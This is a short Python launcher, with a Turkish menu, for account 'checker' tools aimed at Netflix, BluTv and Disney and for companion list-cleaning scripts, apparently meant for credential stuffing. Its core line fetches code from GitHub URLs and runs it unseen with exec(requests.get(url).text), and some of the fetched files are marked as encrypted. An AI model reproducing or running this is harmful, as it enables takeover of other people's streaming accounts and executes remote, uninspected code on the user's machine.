import requests
import os
from cfonts import render, say

UMUT = render('{UM4TVıP1}',
colors=['white', 'blue'], align='center')
print(f'''\n

┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓   
     
                      {UMUT}
    ~ Programmer : @Um4tİsAfk ~
 
   ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛    
''')	 

print(f"""\x1b[38;5;117m  1\x1b[38;5;231m - Netflix Checker | \x1b[1;32m Aktif ✅ 
\x1b[38;5;117m  2\x1b[38;5;231m - BluTv Checker | \x1b[1;32m Aktif ✅
\x1b[38;5;117m  3\x1b[38;5;231m - Disney Checker  | \x1b[1;32m Aktif ✅
\x1b[38;5;117m  4\x1b[38;5;231m - Netflix List Silici  | \x1b[1;32m Aktif ✅
\x1b[38;5;117m  5\x1b[38;5;231m - BluTv List Silici  | \x1b[1;32m Aktif ✅
\x1b[38;5;117m  6\x1b[38;5;231m - Disney List Silici  | \x1b[1;32m Aktif ✅

""")



def shelby():
    print("\x1b[1;39m—"*60)
    secim=input(" • Seçiminiz: ")
    
    baglantilar = {
        "1": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/ENC-netflixchecker.py",
        "2": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/ENC-blutvchecker.py",
        "3": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/ENC-disneychecker.py",
        "4": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/netflixlistesilici.py",
        "5": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/blutvlistesilici.py",
        "6": "https://raw.githubusercontent.com/Um4t/Um4tVip/refs/heads/main/disneylistesilici.py"

        
    }
    if secim in baglantilar:um4t(baglantilar[secim])
    else:print("1 ile 6 arası bir sayı girmelisin.");shelby()
def um4t(url):
    try:exec(requests.get(url).text)
    except Exception as e:print(f"h-am{e}")
if __name__=="__main__":shelby()
